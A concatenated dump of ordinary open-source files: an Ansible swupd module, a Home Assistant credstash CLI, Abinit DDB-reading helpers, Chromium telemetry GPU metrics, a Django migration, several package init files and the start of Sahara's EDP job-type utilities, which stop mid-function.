| repo_name | ref | path | copies | content |
|---|---|---|---|---|
tdtrask/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/swupd.py
|
49
|
#!/usr/bin/python
# (c) 2017, Alberto Murillo <alberto.murillo.silva@intel.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in Clear Linux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
version_added: "2.3"
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
required: false
default: null
format:
description:
      - The format suffix for version file downloads, for example 1, 2, 3 or staging.
        If not specified, the default format is used.
required: false
default: null
manifest:
description:
      - The manifest contains information about the bundles at a certain version of the OS.
        Specify a manifest version to verify against that version, or leave unspecified to
        verify against the current version.
required: false
default: null
aliases: [release, version]
name:
description:
      - Name of the I(bundle) to install or remove.
required: false
default: null
aliases: [bundle]
state:
description:
      - Indicates the desired I(bundle) state. C(present) ensures the bundle
        is installed, while C(absent) ensures the I(bundle) is not installed.
required: false
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
required: false
default: no
url:
description:
- Overrides both I(contenturl) and I(versionurl).
required: false
default: null
verify:
description:
- Verify content for OS version.
required: false
    default: no
versionurl:
description:
- URL for version string download.
required: false
default: null
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Install the "foo" bundle
swupd:
name: foo
state: present
- name: Remove the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: string
stderr:
description: stderr of swupd
returned: always
type: string
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
FILES_NOT_MATCH = "files did not match"
FILES_REPLACED = "missing files were replaced"
FILES_FIXED = "files were fixed"
FILES_DELETED = "files were deleted"
def __init__(self, module):
# Fail if swupd is not found
self.module = module
self.swupd_cmd = module.get_bin_path("swupd", False)
if not self.swupd_cmd:
module.fail_json(msg="Could not find swupd.")
# Initialize parameters
for key in module.params.keys():
setattr(self, key, module.params[key])
# Initialize return values
self.changed = False
self.failed = False
self.msg = None
self.rc = None
self.stderr = ""
self.stdout = ""
def _run_cmd(self, cmd):
self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)
def _get_cmd(self, command):
cmd = "%s %s" % (self.swupd_cmd, command)
if self.format:
cmd += " --format=%s" % self.format
if self.manifest:
cmd += " --manifest=%s" % self.manifest
if self.url:
cmd += " --url=%s" % self.url
else:
if self.contenturl and command != "check-update":
cmd += " --contenturl=%s" % self.contenturl
if self.versionurl:
cmd += " --versionurl=%s" % self.versionurl
return cmd
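        # Illustration (hypothetical option values): with format="3" and
        # manifest=12920 set, _get_cmd("bundle-add foo") builds
        # "swupd bundle-add foo --format=3 --manifest=12920".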
def _is_bundle_installed(self, bundle):
try:
os.stat("/usr/share/clear/bundles/%s" % bundle)
except OSError:
return False
return True
def _needs_update(self):
cmd = self._get_cmd("check-update")
self._run_cmd(cmd)
if self.rc == 0:
return True
if self.rc == 1:
return False
self.failed = True
self.msg = "Failed to check for updates"
def _needs_verify(self):
cmd = self._get_cmd("verify")
self._run_cmd(cmd)
if self.rc != 0:
self.failed = True
self.msg = "Failed to check for filesystem inconsistencies."
if self.FILES_NOT_MATCH in self.stdout:
return True
return False
def install_bundle(self, bundle):
"""Installs a bundle with `swupd bundle-add bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=not self._is_bundle_installed(bundle))
if self._is_bundle_installed(bundle):
self.msg = "Bundle %s is already installed" % bundle
return
cmd = self._get_cmd("bundle-add %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s installed" % bundle
return
if self.rc == 18:
self.msg = "Bundle name %s is invalid" % bundle
return
self.failed = True
self.msg = "Failed to install bundle %s" % bundle
def remove_bundle(self, bundle):
"""Removes a bundle with `swupd bundle-remove bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=self._is_bundle_installed(bundle))
if not self._is_bundle_installed(bundle):
self.msg = "Bundle %s not installed"
return
cmd = self._get_cmd("bundle-remove %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s removed" % bundle
return
self.failed = True
self.msg = "Failed to remove bundle %s" % bundle
def update_os(self):
"""Updates the os with `swupd update`"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_update())
if not self._needs_update():
self.msg = "There are no updates available"
return
cmd = self._get_cmd("update")
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Update successful"
return
self.failed = True
self.msg = "Failed to check for updates"
def verify_os(self):
"""Verifies filesystem against specified or current version"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_verify())
if not self._needs_verify():
self.msg = "No files where changed"
return
cmd = self._get_cmd("verify --fix")
self._run_cmd(cmd)
if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
self.changed = True
self.msg = "Fix successful"
return
self.failed = True
self.msg = "Failed to verify the OS"
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
contenturl=dict(type="str"),
format=dict(type="str"),
manifest=dict(aliases=["release", "version"], type="int"),
name=dict(aliases=["bundle"], type="str"),
state=dict(default="present", choices=["present", "absent"], type="str"),
update=dict(default=False, type="bool"),
url=dict(type="str"),
verify=dict(default=False, type="bool"),
versionurl=dict(type="str"),
),
required_one_of=[["name", "update", "verify"]],
mutually_exclusive=[["name", "update", "verify"]],
supports_check_mode=True
)
swupd = Swupd(module)
name = module.params["name"]
state = module.params["state"]
update = module.params["update"]
verify = module.params["verify"]
if update:
swupd.update_os()
elif verify:
swupd.verify_os()
elif state == "present":
swupd.install_bundle(name)
elif state == "absent":
swupd.remove_bundle(name)
else:
swupd.failed = True
if swupd.failed:
module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
else:
module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
if __name__ == '__main__':
main()
|
detiber/ansible
|
refs/heads/devel
|
test/integration/targets/module_utils/module_utils/spam3/ham/bacon.py
|
298
|
data = 'spam3'
|
f-u-n/playtime
|
refs/heads/master
|
count_the_ones/g3wanghc/count_ones.py
|
2
|
def countTheOnes(number):
return len(list(filter(lambda n: n == '1', str(number))))
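# Equivalent and arguably clearer one-liner: str(number).count('1')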
print(countTheOnes(467))
print(countTheOnes(81511))
print(countTheOnes(123))
|
aronsky/home-assistant
|
refs/heads/dev
|
homeassistant/scripts/credstash.py
|
7
|
"""Script to get, put and delete secrets stored in credstash."""
import argparse
import getpass
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['credstash==1.14.0', 'botocore==1.7.34']
def run(args):
"""Handle credstash script."""
parser = argparse.ArgumentParser(
description=("Modify Home Assistant secrets in credstash."
"Use the secrets in configuration files with: "
"!secret <name>"))
parser.add_argument(
'--script', choices=['credstash'])
parser.add_argument(
'action', choices=['get', 'put', 'del', 'list'],
help="Get, put or delete a secret, or list all available secrets")
parser.add_argument(
'name', help="Name of the secret", nargs='?', default=None)
parser.add_argument(
'value', help="The value to save when putting a secret",
nargs='?', default=None)
# pylint: disable=import-error, no-member
import credstash
import botocore
args = parser.parse_args(args)
table = _SECRET_NAMESPACE
try:
credstash.listSecrets(table=table)
except botocore.errorfactory.ClientError:
credstash.createDdbTable(table=table)
if args.action == 'list':
secrets = [i['name'] for i in credstash.listSecrets(table=table)]
deduped_secrets = sorted(set(secrets))
print('Saved secrets:')
for secret in deduped_secrets:
print(secret)
return 0
if args.name is None:
parser.print_help()
return 1
if args.action == 'put':
if args.value:
the_secret = args.value
else:
the_secret = getpass.getpass('Please enter the secret for {}: '
.format(args.name))
current_version = credstash.getHighestVersion(args.name, table=table)
credstash.putSecret(args.name,
the_secret,
version=int(current_version) + 1,
table=table)
print('Secret {} put successfully'.format(args.name))
elif args.action == 'get':
the_secret = credstash.getSecret(args.name, table=table)
if the_secret is None:
print('Secret {} not found'.format(args.name))
else:
print('Secret {}={}'.format(args.name, the_secret))
elif args.action == 'del':
credstash.deleteSecrets(args.name, table=table)
print('Deleted secret {}'.format(args.name))
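# Typical invocations (script name per the parser above; the hass CLI entry
# point is assumed):
#   hass --script credstash put my_secret "hunter2"
#   hass --script credstash list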
|
mailhexu/pyDFTutils
|
refs/heads/master
|
build/lib/pyDFTutils/abinit/abinit.py
|
2
|
#!/usr/bin/env python
"""
abinit calculator helper functions. Set default values for the calculations.
See also ase.calculators.abinit, ase_utils.myabinit
"""
from ase.units import eV, Ha, Bohr
from ase_utils.myabinit import Abinit
from ase.data import atomic_masses, atomic_numbers, chemical_symbols
from ase.atoms import Atoms
import numpy as np
def abinit_calculator(ecut=35 * Ha,
xc='LDA',
nk=8,
mag_order='PM',
is_metal=False,
pps='ONCV',
**kwargs):
"""
    Default Abinit calculator.
Parameters
------------
ecut: float
energy cutoff
xc: string
XC functional
nk: int
k-point mesh nk*nk*nk. use kpts=[nk1,nk2,nk3] for unequal nk's.
mag_order: string
FM|PM|A|G|C|
is_metal: bool
        Is it metallic? If unknown, set is_metal to True.
**kwargs:
        args passed to the calculator's set function.
Returns
------------
    An Abinit calculator object, derived from ase.calculators.abinit.
"""
calc = Abinit(
label='abinit',
xc=xc,
accuracy=5,
ecut=ecut * eV,
kpts=[nk, nk, nk],
gamma=False,
#chksymbreak=0,
pppaths=['/home/hexu/.local/pp/abinit/'],
pps=pps,
chksymbreak=0,
pawecutdg=ecut * 1.8 * eV,
diemac=5.4,
diemix=0.7,
#iprcel=45,
autoparal=1, )
if mag_order == 'PM' and is_metal:
calc.set(occopt=7, nsppol=1, nspinor=1, nspden=1, diemac=1e5)
calc.set(tsmear=0.001 * Ha)
elif mag_order == 'PM' and not is_metal:
calc.set(occopt=1, nsppol=1, nspinor=1, nspden=1)
elif mag_order == 'FM' or is_metal:
calc.set(occopt=4, nsppol=2)
calc.set(tsmear=0.001 * Ha, diemac=1e5)
else:
calc.set(occopt=1, nsppol=1, nspinor=1, nspden=2)
calc.set(iscf=17, nstep=50)
calc.set(**kwargs)
return calc
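# Example usage (values illustrative; the pseudopotential paths above are
# machine-specific assumptions):
#   calc = abinit_calculator(ecut=30 * Ha, xc='PBE', nk=6, mag_order='FM')
#   atoms.set_calculator(calc)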
class DDB_reader():
def __init__(self, fname):
"""
class for reading DDB files.
"""
self.fname = fname
def read_atoms(self):
"""
read atomic structure from DDB file.
Returns:
-----------
ase.atoms object.
"""
with open(self.fname) as myfile:
for line in myfile:
if line.strip().startswith('natom'):
self.natom = int(line.strip().split()[-1])
if line.strip().startswith("ntypat"):
ntypat = int(line.strip().split()[-1])
if line.strip().startswith("acell"):
acell = [
float(s.replace('D', 'E')) * Bohr
for s in line.strip().split()[1:4]
]
if line.strip().startswith("typat"):
typat = [int(s) for s in line.strip().split()[1:]]
if line.strip().startswith("znucl"):
znucl = [
int(float(s.replace('D', 'E')))
for s in line.strip().split()[1:4]
]
if line.strip().startswith("rprim"):
rprim0 = [
float(s.replace('D', 'E')) * acell[0]
for s in line.strip().split()[1:4]
]
                    line = next(myfile)
rprim1 = [
float(s.replace('D', 'E')) * acell[1]
for s in line.strip().split()
]
                    line = next(myfile)
rprim2 = [
float(s.replace('D', 'E')) * acell[2]
for s in line.strip().split()
]
if line.strip().startswith("xred"):
spos = np.zeros((
self.natom,
3, ))
spos[0] = [
float(s.replace('D', 'E'))
for s in line.strip().split()[-3:]
]
for i in range(1, self.natom):
                        line = next(myfile)
                        print(line)
spos[i] = [
float(s.replace('D', 'E'))
for s in line.strip().split()[-3:]
]
numbers = [znucl[i - 1] for i in typat]
self.symbols = [chemical_symbols[i] for i in numbers]
self.masses = [atomic_masses[i] for i in numbers]
self.cell = [rprim0, rprim1, rprim2]
        print(self.symbols)
self.atoms = Atoms(self.symbols, positions=spos, cell=self.cell)
return self.atoms
def read_2DE_DDB(self, mat=True):
"""
Read total energy 2nd derivatives from DDB files.
Parameters:
-------------
fname: string
The name of the DDB file.
Returns:
-------------
dict dds.
The keys are tuples: (idir1, ipert1, idir2, ipert2), values are complex numbers.
idir, idir2 are the directions (1,2,3), ipert1, ipert2 are perturbations.
ipert= 1..natom are atomic displacements;
natom+1: ddk;
natom+2: electric field;
natom+3: uniaxial strains;
natom+4: shear strain.
"""
dds = {}
with open(self.fname) as myfile:
for line in myfile:
if line.find('**** Database of total energy derivatives ****'
) != -1:
                    l = next(myfile)
nblock = int(l.strip().split()[-1])
#print "Nblock:",nblock
                    next(myfile)
                    l = next(myfile)
nelem = int(l.strip().split()[-1])
#print nelem
                    l = next(myfile)
self.qpt = [
float(x.replace('D', 'E'))
for x in l.strip().split()[1:4]
]
#print qpts
for i in range(nelem):
try:
                            l = next(myfile)
idir1, ipert1, idir2, ipert2 = [
int(x) for x in l.strip().split()[0:4]
]
realval, imageval = [
float(x.replace('D', 'E'))
for x in l.strip().split()[4:6]
]
dds[(idir1, ipert1, idir2,
ipert2)] = realval + 1j * imageval
                        except (ValueError, IndexError):
                            # Skip lines that do not parse as derivative entries.
                            pass
self.dynamic_matrix_dict = dds
return self.dynamic_matrix_dict
def get_dynamic_matrix(self):
"""
Parameters:
------------
dds: output or read_2DE_DDB
Returns:
------------
2D matrix. the indices means: (ipert,idir) = (1,1) (1,2) (1,3) (2,1) ...(natom,3)
"""
natom = len(self.atoms)
dynmat = np.zeros((natom * 3, natom * 3), dtype=complex)
for ipert1 in range(natom):
for idir1 in range(3):
for ipert2 in range(natom):
for idir2 in range(3):
dynmat[ipert1 * 3 + idir1, ipert2 * 3 +
idir2] = self.dynamic_matrix_dict[(
idir1+1, ipert1+1, idir2+1, ipert2+1)]
return dynmat
#myreader = DDB_reader("../test/BaTiO3_bak/abinito_DS2_DDB")
#print myreader.read_atoms().get_positions()
#myreader.read_2DE_DDB()
#print myreader.get_dynamic_matrix()
|
jymannob/CouchPotatoServer
|
refs/heads/develop
|
libs/rsa/__init__.py
|
111
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
If you want to have a more secure implementation, use the functions from the
``rsa.pkcs1`` module.
"""
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2012-06-17"
__version__ = '3.1.1'
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
|
Workday/OpenFrame
|
refs/heads/master
|
tools/telemetry/telemetry/web_perf/metrics/gpu_timeline.py
|
15
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import math
import sys
from telemetry.timeline import model as model_module
from telemetry.value import improvement_direction
from telemetry.value import list_of_scalar_values
from telemetry.value import scalar
from telemetry.web_perf.metrics import timeline_based_metric
TOPLEVEL_GL_CATEGORY = 'gpu_toplevel'
TOPLEVEL_SERVICE_CATEGORY = 'disabled-by-default-gpu.service'
TOPLEVEL_DEVICE_CATEGORY = 'disabled-by-default-gpu.device'
SERVICE_FRAME_END_MARKER = (TOPLEVEL_SERVICE_CATEGORY, 'SwapBuffer')
DEVICE_FRAME_END_MARKER = (TOPLEVEL_DEVICE_CATEGORY, 'SwapBuffer')
TRACKED_GL_CONTEXT_NAME = {'RenderCompositor': 'render_compositor',
'BrowserCompositor': 'browser_compositor',
'Compositor': 'browser_compositor'}
def _CalculateFrameTimes(events_per_frame, event_data_func):
"""Given a list of events per frame and a function to extract event time data,
returns a list of frame times."""
times_per_frame = []
for event_list in events_per_frame:
event_times = [event_data_func(event) for event in event_list]
times_per_frame.append(sum(event_times))
return times_per_frame
def _CPUFrameTimes(events_per_frame):
"""Given a list of events per frame, returns a list of CPU frame times."""
# CPU event frames are calculated using the event thread duration.
  # Some platforms do not support thread_duration; convert those to 0.
return _CalculateFrameTimes(events_per_frame,
lambda event: event.thread_duration or 0)
def _GPUFrameTimes(events_per_frame):
"""Given a list of events per frame, returns a list of GPU frame times."""
# GPU event frames are asynchronous slices which use the event duration.
return _CalculateFrameTimes(events_per_frame,
lambda event: event.duration)
def TimelineName(name, source_type, value_type):
"""Constructs the standard name given in the timeline.
Args:
name: The name of the timeline, for example "total", or "render_compositor".
source_type: One of "cpu", "gpu" or None. None is only used for total times.
value_type: the type of value. For example "mean", "stddev"...etc.
"""
if source_type:
return '%s_%s_%s_time' % (name, value_type, source_type)
else:
return '%s_%s_time' % (name, value_type)
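# For example, TimelineName('total', 'cpu', 'mean') returns 'total_mean_cpu_time',
# and TimelineName('swap', None, 'mean') returns 'swap_mean_time'.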
class GPUTimelineMetric(timeline_based_metric.TimelineBasedMetric):
"""Computes GPU based metrics."""
def __init__(self):
super(GPUTimelineMetric, self).__init__()
def AddResults(self, model, _, interaction_records, results):
self.VerifyNonOverlappedRecords(interaction_records)
service_times = self._CalculateGPUTimelineData(model)
for value_item, durations in service_times.iteritems():
count = len(durations)
avg = 0.0
stddev = 0.0
maximum = 0.0
if count:
avg = sum(durations) / count
stddev = math.sqrt(sum((d - avg) ** 2 for d in durations) / count)
maximum = max(durations)
name, src = value_item
if src:
frame_times_name = '%s_%s_frame_times' % (name, src)
else:
frame_times_name = '%s_frame_times' % (name)
if durations:
results.AddValue(list_of_scalar_values.ListOfScalarValues(
results.current_page, frame_times_name, 'ms', durations,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'max'), 'ms', maximum,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'mean'), 'ms', avg,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'stddev'), 'ms', stddev,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
def _CalculateGPUTimelineData(self, model):
"""Uses the model and calculates the times for various values for each
frame. The return value will be a dictionary of the following format:
{
(EVENT_NAME1, SRC1_TYPE): [FRAME0_TIME, FRAME1_TIME...etc.],
(EVENT_NAME2, SRC2_TYPE): [FRAME0_TIME, FRAME1_TIME...etc.],
}
Events:
swap - The time in milliseconds between each swap marker.
total - The amount of time spent in the renderer thread.
TRACKED_NAMES: Using the TRACKED_GL_CONTEXT_NAME dict, we
include the traces per frame for the
tracked name.
Source Types:
None - This will only be valid for the "swap" event.
cpu - For an event, the "cpu" source type signifies time spent on the
gpu thread using the CPU. This uses the "gpu.service" markers.
gpu - For an event, the "gpu" source type signifies time spent on the
gpu thread using the GPU. This uses the "gpu.device" markers.
"""
all_service_events = []
current_service_frame_end = sys.maxint
current_service_events = []
all_device_events = []
current_device_frame_end = sys.maxint
current_device_events = []
tracked_events = {}
tracked_events.update(
dict([((value, 'cpu'), [])
for value in TRACKED_GL_CONTEXT_NAME.itervalues()]))
tracked_events.update(
dict([((value, 'gpu'), [])
for value in TRACKED_GL_CONTEXT_NAME.itervalues()]))
# These will track traces within the current frame.
current_tracked_service_events = collections.defaultdict(list)
current_tracked_device_events = collections.defaultdict(list)
event_iter = model.IterAllEvents(
event_type_predicate=model_module.IsSliceOrAsyncSlice)
for event in event_iter:
# Look for frame end markers
if (event.category, event.name) == SERVICE_FRAME_END_MARKER:
current_service_frame_end = event.end
elif (event.category, event.name) == DEVICE_FRAME_END_MARKER:
current_device_frame_end = event.end
# Track all other toplevel gl category markers
elif event.args.get('gl_category', None) == TOPLEVEL_GL_CATEGORY:
base_name = event.name
dash_index = base_name.rfind('-')
if dash_index != -1:
base_name = base_name[:dash_index]
tracked_name = TRACKED_GL_CONTEXT_NAME.get(base_name, None)
if event.category == TOPLEVEL_SERVICE_CATEGORY:
# Check if frame has ended.
if event.start >= current_service_frame_end:
if current_service_events:
all_service_events.append(current_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'cpu')].append(
current_tracked_service_events[value])
current_service_events = []
current_service_frame_end = sys.maxint
current_tracked_service_events.clear()
current_service_events.append(event)
if tracked_name:
current_tracked_service_events[tracked_name].append(event)
elif event.category == TOPLEVEL_DEVICE_CATEGORY:
# Check if frame has ended.
if event.start >= current_device_frame_end:
if current_device_events:
all_device_events.append(current_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'gpu')].append(
current_tracked_device_events[value])
current_device_events = []
current_device_frame_end = sys.maxint
current_tracked_device_events.clear()
current_device_events.append(event)
if tracked_name:
current_tracked_device_events[tracked_name].append(event)
# Append Data for Last Frame.
if current_service_events:
all_service_events.append(current_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'cpu')].append(
current_tracked_service_events[value])
if current_device_events:
all_device_events.append(current_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'gpu')].append(
current_tracked_device_events[value])
# Calculate Mean Frame Time for the CPU side.
frame_times = []
if all_service_events:
prev_frame_end = all_service_events[0][0].start
for event_list in all_service_events:
last_service_event_in_frame = event_list[-1]
frame_times.append(last_service_event_in_frame.end - prev_frame_end)
prev_frame_end = last_service_event_in_frame.end
# Create the timeline data dictionary for service side traces.
total_frame_value = ('swap', None)
cpu_frame_value = ('total', 'cpu')
gpu_frame_value = ('total', 'gpu')
timeline_data = {}
timeline_data[total_frame_value] = frame_times
timeline_data[cpu_frame_value] = _CPUFrameTimes(all_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
cpu_value = (value, 'cpu')
timeline_data[cpu_value] = _CPUFrameTimes(tracked_events[cpu_value])
    # Add in GPU-side traces if supported (i.e. device traces exist).
if all_device_events:
timeline_data[gpu_frame_value] = _GPUFrameTimes(all_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
gpu_value = (value, 'gpu')
tracked_gpu_event = tracked_events[gpu_value]
timeline_data[gpu_value] = _GPUFrameTimes(tracked_gpu_event)
return timeline_data
|
xkmato/casepro
|
refs/heads/master
|
casepro/cases/migrations/0028_case_initial_message.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from django.db import migrations, models
def populate_initial_message(apps, schema_editor):
Message = apps.get_model('msgs', 'Message')
Case = apps.get_model('cases', 'Case')
cases = list(Case.objects.all())
num_missing = 0
for case in cases:
message = Message.objects.filter(org=case.org, backend_id=case.message_id).select_related('contact').first()
if message:
case.contact = message.contact
case.initial_message = message
            case.save(update_fields=('contact', 'initial_message'))
else:
print("Missing message #%d for org #%d" % (case.message_id, case.org_id))
num_missing += 1
if cases:
print("Updated %d cases (%d missing messages)" % (len(cases), num_missing))
class Migration(migrations.Migration):
dependencies = [
('msgs', '0020_auto_20160303_1058'),
('cases', '0027_auto_20160222_1250'),
]
operations = [
migrations.AddField(
model_name='case',
name='initial_message',
field=models.OneToOneField(related_name='initial_case', null=True, to='msgs.Message'),
),
migrations.RunPython(populate_initial_message),
migrations.RemoveField(
model_name='case',
name='message_on',
)
]
|
beatrizjesus/my-first-blog
|
refs/heads/master
|
pasta/Lib/site-packages/pip/_vendor/colorama/__init__.py
|
445
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from .initialise import init, deinit, reinit
from .ansi import Fore, Back, Style, Cursor
from .ansitowin32 import AnsiToWin32
__version__ = '0.3.3'
|
jeffery9/mixprint_addons
|
refs/heads/master
|
l10n_fr/report/__init__.py
|
15
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
crobby/sahara
|
refs/heads/master
|
sahara/utils/edp.py
|
3
|
# Copyright (c) 2014 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import six
from sahara.utils import files
# job execution status
JOB_STATUS_DONEWITHERROR = 'DONEWITHERROR'
JOB_STATUS_FAILED = 'FAILED'
JOB_STATUS_KILLED = 'KILLED'
JOB_STATUS_PENDING = 'PENDING'
JOB_STATUS_RUNNING = 'RUNNING'
JOB_STATUS_SUCCEEDED = 'SUCCEEDED'
JOB_STATUS_TOBEKILLED = 'TOBEKILLED'
# statuses for terminated jobs
JOB_STATUSES_TERMINATED = [
JOB_STATUS_DONEWITHERROR,
JOB_STATUS_FAILED,
JOB_STATUS_KILLED,
JOB_STATUS_SUCCEEDED
]
# job type separator character
JOB_TYPE_SEP = '.'
# job sub types available
JOB_SUBTYPE_STREAMING = 'Streaming'
JOB_SUBTYPE_NONE = ''
# job types available
JOB_TYPE_HIVE = 'Hive'
JOB_TYPE_JAVA = 'Java'
JOB_TYPE_MAPREDUCE = 'MapReduce'
JOB_TYPE_SPARK = 'Spark'
JOB_TYPE_STORM = 'Storm'
JOB_TYPE_MAPREDUCE_STREAMING = (JOB_TYPE_MAPREDUCE + JOB_TYPE_SEP +
JOB_SUBTYPE_STREAMING)
JOB_TYPE_PIG = 'Pig'
JOB_TYPE_SHELL = 'Shell'
# job type groupings available
JOB_TYPES_ALL = [
JOB_TYPE_HIVE,
JOB_TYPE_JAVA,
JOB_TYPE_MAPREDUCE,
JOB_TYPE_MAPREDUCE_STREAMING,
JOB_TYPE_PIG,
JOB_TYPE_SHELL,
JOB_TYPE_SPARK,
JOB_TYPE_STORM
]
JOB_TYPES_ACCEPTABLE_CONFIGS = {
JOB_TYPE_HIVE: {"configs", "params"},
JOB_TYPE_PIG: {"configs", "params", "args"},
JOB_TYPE_MAPREDUCE: {"configs"},
JOB_TYPE_MAPREDUCE_STREAMING: {"configs"},
JOB_TYPE_JAVA: {"configs", "args"},
JOB_TYPE_SHELL: {"configs", "params", "args"},
JOB_TYPE_SPARK: {"configs", "args"},
JOB_TYPE_STORM: {"args"}
}
ADAPT_FOR_OOZIE = 'edp.java.adapt_for_oozie'
ADAPT_SPARK_FOR_SWIFT = 'edp.spark.adapt_for_swift'
def split_job_type(job_type):
'''Split a job type string into a type and subtype
The split is done on the first '.'. A subtype will
always be returned, even if it is empty.
'''
type_info = job_type.split(JOB_TYPE_SEP, 1)
if len(type_info) == 1:
type_info.append('')
return type_info
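# For example, split_job_type('MapReduce.Streaming') returns
# ['MapReduce', 'Streaming'], and split_job_type('Pig') returns ['Pig', ''].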
def compare_job_type(job_type, *args, **kwargs):
'''Compare a job type against a list of job types
:param job_type: The job type being compared
:param *args: A list of types to compare against
:param strict: Passed as a keyword arg. Default is False.
If strict is False, job_type will be compared
with and without its subtype indicator.
:returns: True if job_type is present in the list, False otherwise
'''
strict = kwargs.get('strict', False)
res = job_type in args
if res or strict or JOB_TYPE_SEP not in job_type:
return res
jtype, jsubtype = split_job_type(job_type)
return jtype in args
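# For example, compare_job_type('MapReduce.Streaming', 'MapReduce') is True,
# but with strict=True it is False because the subtype must match exactly.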
def get_hive_shared_conf_path(hdfs_user):
return "/user/%s/conf/hive-site.xml" % hdfs_user
def is_adapt_for_oozie_enabled(configs):
return configs.get(ADAPT_FOR_OOZIE, False)
def is_adapt_spark_for_swift_enabled(configs):
return configs.get(ADAPT_SPARK_FOR_SWIFT, False)
def get_builtin_binaries(job, configs):
if job.type == JOB_TYPE_JAVA:
if is_adapt_for_oozie_enabled(configs):
